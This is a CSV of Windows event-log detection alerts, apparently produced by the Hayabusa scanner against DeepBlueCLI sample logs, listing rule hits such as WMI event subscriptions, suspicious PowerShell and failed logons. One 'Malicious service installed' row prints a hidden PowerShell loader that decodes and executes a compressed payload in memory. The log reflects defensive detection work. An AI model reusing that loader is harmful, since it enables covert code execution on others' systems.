Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 
05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 